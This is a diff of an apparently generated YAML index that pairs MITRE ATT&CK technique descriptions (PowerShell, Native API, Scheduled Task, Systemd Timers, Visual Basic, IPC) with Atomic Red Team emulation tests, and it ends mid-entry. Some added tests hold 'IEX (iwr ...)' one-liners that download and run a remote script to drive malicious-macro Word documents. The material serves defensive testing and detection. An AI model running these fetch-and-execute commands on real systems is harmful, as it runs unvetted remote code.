@@ execution: atomic_tests: [] T1559: technique: - created: '2020-02-12T14:08:48.689Z' - modified: '2020-03-28T19:34:47.546Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern - id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d + external_references: + - source_name: mitre-attack + external_id: T1559 + url: https://attack.mitre.org/techniques/T1559 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Inter-Process Communication description: "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is @@ -44022,28 +51835,27 @@ execution: or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms." - name: Inter-Process Communication - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1559 - url: https://attack.mitre.org/techniques/T1559 - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries, - or spawned processes that are associated with abuse of IPC mechanisms. - x_mitre_permissions_required: - - Administrator - - User - - SYSTEM + id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2020-03-28T19:34:47.546Z' + created: '2020-02-12T14:08:48.689Z' x_mitre_data_sources: - Process monitoring - DLL monitoring - File monitoring + x_mitre_permissions_required: + - Administrator + - User + - SYSTEM + x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries, + or spawned processes that are associated with abuse of IPC mechanisms. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows atomic_tests: [] T1059.007: technique: @@ -44618,17 +52430,14 @@ execution: atomic_tests: [] T1106: technique: - id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Native API - description: |- - Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. - - Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) - - Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) - - Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system. + created: '2017-05-31T21:31:17.472Z' + modified: '2020-07-01T16:19:54.646Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1106 @@ -44675,21 +52484,26 @@ execution: - source_name: macOS Foundation url: https://developer.apple.com/documentation/foundation description: Apple. (n.d.). Foundation. Retrieved July 1, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-07-01T16:19:54.646Z' - created: '2017-05-31T21:31:17.472Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_remote_support: false - x_mitre_permissions_required: - - User + description: |- + Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. + + Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) + + Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) + + Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system. + name: Native API + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670 + x_mitre_is_subtechnique: false + x_mitre_version: '2.0' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_data_sources: + - System calls + - Loaded DLLs + - API monitoring + - Process monitoring x_mitre_detection: "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish @@ -44703,15 +52517,13 @@ execution: to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. " - x_mitre_data_sources: - - System calls - - Loaded DLLs - - API monitoring - - Process monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_version: '2.0' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_remote_support: false + x_mitre_platforms: + - Windows + - macOS + - Linux identifier: T1106 atomic_tests: - name: Execution through API - CreateProcess @@ -44734,8 +52546,83 @@ execution: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file} %tmp%/T1106.exe name: command_prompt + T1059.008: + technique: + id: attack-pattern--818302b2-d640-477b-bf88-873120ce85c4 + description: "Adversaries may abuse scripting or built-in command line interpreters + (CLI) on network devices to execute malicious command and payloads. The CLI + is the primary means through which users and administrators interact with + the device in order to view system information, modify device operations, + or perform diagnostic and administrative functions. CLIs typically contain + various permission levels required for different commands. \n\nScripting interpreters + automate tasks and extend functionality beyond the command set included in + the network OS. The CLI and scripting interpreter are accessible through a + direct console connection, or through remote means, such as telnet or secure + shell (SSH).\n\nAdversaries can use the network CLI to change how network + devices behave and operate. The CLI may be used to manipulate traffic flows + to intercept or manipulate data, modify startup configuration parameters to + load malicious system software, or to disable security features or logging + to avoid detection. (Citation: Cisco Synful Knock Evolution)" + name: Network Device CLI + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1059.008 + url: https://attack.mitre.org/techniques/T1059/008 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Command History + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command + History. Retrieved October 21, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2020-10-22T16:43:38.388Z' + created: '2020-10-20T00:09:33.072Z' + x_mitre_data_sources: + - Network device logs + - Network device run-time memory + - Network device command history + - Network device configuration + x_mitre_platforms: + - Network + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: |- + Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History) + + Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. + x_mitre_permissions_required: + - Administrator + - User + atomic_tests: [] T1059.001: technique: + created: '2020-03-09T13:48:55.078Z' + modified: '2020-06-24T13:51:22.360Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 + description: |- + Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). + + PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. + + A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) + + PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) + name: PowerShell + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059.001 @@ -44768,37 +52655,10 @@ execution: description: Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. source_name: FireEye PowerShell Logging 2016 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: PowerShell - description: |- - Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). - - PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. - - A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) - - PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) - id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-06-24T13:51:22.360Z' - created: '2020-03-09T13:48:55.078Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_remote_support: true - x_mitre_detection: |- - If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. - - Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) - - It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Praetorian x_mitre_data_sources: - Windows event logs - Process monitoring @@ -44807,10 +52667,18 @@ execution: - Loaded DLLs - File monitoring - DLL monitoring - x_mitre_contributors: - - Praetorian - x_mitre_platforms: - - Windows + x_mitre_detection: |- + If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. + + Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) + + It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. + x_mitre_remote_support: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1059.001 atomic_tests: - name: Mimikatz @@ -45474,10 +53342,58 @@ execution: >$null 2>&1 ' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\") + \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell T1053: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:46.977Z' + modified: '2020-10-14T15:20:01.069Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). external_references: - source_name: mitre-attack external_id: T1053 @@ -45489,35 +53405,21 @@ execution: description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016. source_name: TechNet Task Scheduler Security - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). - name: Scheduled Task/Job - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:04.006Z' - created: '2017-05-31T21:30:46.977Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - Linux + - macOS + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User x_mitre_detection: "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look @@ -45528,19 +53430,18 @@ execution: part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_remote_support: true - x_mitre_platforms: - - Windows - - Linux - - macOS + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + - Windows event logs + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1064: technique: @@ -45805,8 +53706,11 @@ execution: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1072 external_id: T1072 + url: https://attack.mitre.org/techniques/T1072 + - external_id: CAPEC-187 + source_name: capec + url: https://capec.mitre.org/data/definitions/187.html description: |- Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). @@ -45822,10 +53726,10 @@ execution: phase_name: execution - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-02-21T16:31:32.789Z' + modified: '2020-09-16T15:27:01.403Z' created: '2017-05-31T21:30:57.201Z' x_mitre_is_subtechnique: false - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_data_sources: - Authentication logs - File monitoring @@ -45951,6 +53855,73 @@ execution: - Windows - macOS atomic_tests: [] + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] T1059.004: technique: id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56 @@ -46095,7 +54066,7 @@ execution: description: |- Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) - Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) + Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. name: Visual Basic @@ -46118,6 +54089,10 @@ execution: url: https://docs.microsoft.com/office/vba/api/overview/ description: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020. + - source_name: Wikipedia VBA + url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications + description: Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August + 13, 2020. - source_name: Microsoft VBScript url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85) description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March @@ -46126,7 +54101,7 @@ execution: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: execution - modified: '2020-06-25T03:32:51.046Z' + modified: '2020-08-13T20:09:39.122Z' created: '2020-03-09T14:29:51.508Z' x_mitre_platforms: - Windows @@ -46147,7 +54122,7 @@ execution: - Administrator - SYSTEM x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1059.005 atomic_tests: - name: Visual Basic script execution to gather local computer information @@ -46210,6 +54185,44 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null +' + name: powershell + - name: Extract Memory via VBA + auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 + description: | + This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this + we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that + memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\") + \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" + -officeProduct \"Word\" -sub \"Extract\"\n" + cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" + -ErrorAction Ignore + ' name: powershell T1059.003: @@ -46260,7 +54273,7 @@ execution: - name: Create and Execute Batch Script auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 description: 'Creates and executes a simple batch script. Upon execution, CMD - will briefly launh to run the batch script then close again. + will briefly launch to run the batch script then close again. ' supported_platforms: @@ -46482,23 +54495,26 @@ lateral-movement: - source_name: mitre-attack external_id: T1550.001 url: https://attack.mitre.org/techniques/T1550/001 + - external_id: CAPEC-593 + source_name: capec + url: https://capec.mitre.org/data/definitions/593.html - description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 - - source_name: okta - url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved + - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019. - - source_name: Microsoft Identity Platform Access 2019 - url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). + url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen + source_name: okta + - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019. - - source_name: Staaldraad Phishing with OAuth 2017 - url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. + url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens + source_name: Microsoft Identity Platform Access 2019 + - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019. + url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ + source_name: Staaldraad Phishing with OAuth 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: 